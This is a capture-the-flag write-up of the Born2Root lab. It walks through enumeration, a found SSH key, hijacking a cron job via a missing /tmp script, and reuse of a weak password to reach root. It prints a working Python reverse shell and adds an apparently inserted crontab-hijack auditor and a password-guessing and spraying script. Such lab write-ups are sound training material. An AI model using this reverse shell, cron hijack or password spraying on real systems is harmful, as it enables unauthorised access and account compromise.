BORN2ROOT — Offensive Security

Offensive Security Proving Ground Complete Write-up

I exported the target's IP as an environment variable, scanned it with nmap, and noted the open ports and services.

Moving on to port 80, the web page listed three users: martin, hadi and jimmy. COOL!!

I then brute-forced directories with wfuzz.

Browsing into the icons directory and enumerating every file there, one of them turned out to contain an SSH key.

AWESOME!! So we had three usernames and an SSH key. Trying the user martin with the password secret lab gave a successful login.

Enumerating martin's machine, I found a crontab entry that runs /tmp/sekurity.py every five minutes, while the file itself did not exist in /tmp. Since /tmp is world-writable, anyone can create that file and have cron execute it as the job's user.
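To make that check repeatable, here is an added example (not code from the original write-up) that parses /etc/crontab-style lines and flags jobs whose script is missing from a writable directory or is itself writable. The crontab text, the job user jimmy and the filesystem model are constructed for illustration; the write-up does not show the real entry or say which user the job runs as.

```python
# Added example, not from the original write-up: audit a system crontab for
# jobs whose script is missing or writable by the current user, the condition
# that made /tmp/sekurity.py exploitable. Filesystem checks are injected so the
# constructed sample below runs offline; audit_live() uses the real filesystem.
import os

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "ruby"}


def parse_system_crontab(text):
    """Parse /etc/crontab-style lines: five schedule fields, a user, then the command."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # skip comments and VAR=value lines
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        entries.append((" ".join(fields[:5]), fields[5], fields[6]))
    return entries


def script_path(command):
    """Absolute path of the script the command runs, skipping a leading interpreter."""
    tokens = command.split()
    if not tokens:
        return None
    if os.path.basename(tokens[0]) in INTERPRETERS and len(tokens) > 1:
        target = tokens[1]
    else:
        target = tokens[0]
    return target if target.startswith("/") else None


def audit(entries, exists, writable):
    """Return (path, user, verdict) for every job we could hijack."""
    findings = []
    for _schedule, user, command in entries:
        path = script_path(command)
        if path is None:
            continue
        if not exists(path):
            parent = os.path.dirname(path) or "/"
            if writable(parent):
                findings.append((path, user, "missing and its directory is writable: plant it"))
        elif writable(path):
            findings.append((path, user, "exists and is writable: modify it"))
    return findings


def audit_live(text):
    """Run the audit against the real filesystem (e.g. on the contents of /etc/crontab)."""
    return audit(parse_system_crontab(text),
                 os.path.exists, lambda p: os.access(p, os.W_OK))


# Constructed sample crontab; the job user "jimmy" is an assumption for the demo.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 *   * * *   jimmy   python /tmp/sekurity.py
0   3   * * *   root    /usr/local/bin/backup.sh
"""

# Constructed filesystem model: /tmp is writable, /usr/local/bin and its script are not.
FAKE_FS = {"/tmp": True, "/usr/local/bin": False, "/usr/local/bin/backup.sh": False}


def demo():
    exists = lambda p: p in FAKE_FS
    writable = lambda p: FAKE_FS.get(p, False)
    return audit(parse_system_crontab(SAMPLE_CRONTAB), exists, writable)


if __name__ == "__main__":
    for path, user, verdict in demo():
        print(f"{path} (runs as {user}): {verdict}")
```

On a real box, feed audit_live() the contents of /etc/crontab and the files under /etc/cron.d; a "missing" verdict with a writable parent directory is exactly the sekurity.py situation, and the user column tells you whose shell you will get.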

So I created /tmp/sekurity.py containing the usual Python reverse shell (the listener address and port are redacted as 0.0.0.0 and 0000; put your own in):

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("0.0.0.0",0000))          # attacker IP and listening port
os.dup2(s.fileno(),0)                # redirect stdin to the socket
os.dup2(s.fileno(),1)                # redirect stdout to the socket
os.dup2(s.fileno(),2)                # redirect stderr to the socket
p=subprocess.call(["/bin/sh","-i"])  # interactive shell over the connection

With my listener waiting on my attacking machine, the shell came back on the next cron run. Good to go!

Enumerating this machine turned up nothing special, and the only user left was hadi, so I tried hadi with the obvious password hadi123, and guess what, it worked!!!!

Enumerating further, I ran su to switch to root and tried the same password, and it logged me in: the root password is simply reused from hadi.
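The two steps above (a username-derived guess for hadi, then reusing that password on root) are the kind of thing worth scripting. The following added example, not part of the original write-up, generates username-based candidates, stops at the first one the login oracle accepts, and then sprays that password across the other accounts. The try_login oracle and the credential table are constructed for an offline demo; on a target you would wire the oracle to an ssh or su attempt.

```python
# Added example, not from the original write-up: username-derived password
# guesses plus a reuse spray. try_login is injected so the constructed oracle
# below runs offline.

SUFFIXES = ["", "1", "12", "123", "1234", "12345", "123456", "!", "@123",
            "2017", "2018", "2019", "2020"]


def username_candidates(username):
    """Ordered, de-duplicated guesses: user, User, USER, resu, each with common suffixes."""
    seen = []
    for base in (username, username.capitalize(), username.upper(), username[::-1]):
        for suffix in SUFFIXES:
            guess = base + suffix
            if guess not in seen:
                seen.append(guess)
    return seen


def guess_password(username, try_login):
    """Return the first candidate try_login(username, pw) accepts, else None."""
    for pw in username_candidates(username):
        if try_login(username, pw):
            return pw
    return None


def spray(users, password, try_login):
    """Which of users accept this password? Catches reuse such as hadi -> root."""
    return [u for u in users if try_login(u, password)]


# Constructed credential table standing in for the target. martin/secret lab
# and hadi/root = hadi123 follow the write-up; jimmy's value is a placeholder.
FAKE_CREDS = {"martin": "secret lab", "jimmy": "<unknown>",
              "hadi": "hadi123", "root": "hadi123"}


def fake_try_login(user, password):
    return FAKE_CREDS.get(user) == password


def demo():
    found = guess_password("hadi", fake_try_login)
    reused = spray(["martin", "jimmy", "root"], found, fake_try_login) if found else []
    return found, reused


if __name__ == "__main__":
    print(demo())
```

Keep the candidate list short and the spray to one password per account: against a real service, this is the difference between a quick win and locking out every user on the box.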

And with that, we are root!!!

That’s all for now!!

Until Next Time,

Stay COOL!!!!

For any query, catch me on:

https://www.linkedin.com/in/user-neeleshpatel/

Neelesh Patel

Cybersecurity | CTFs | Networking |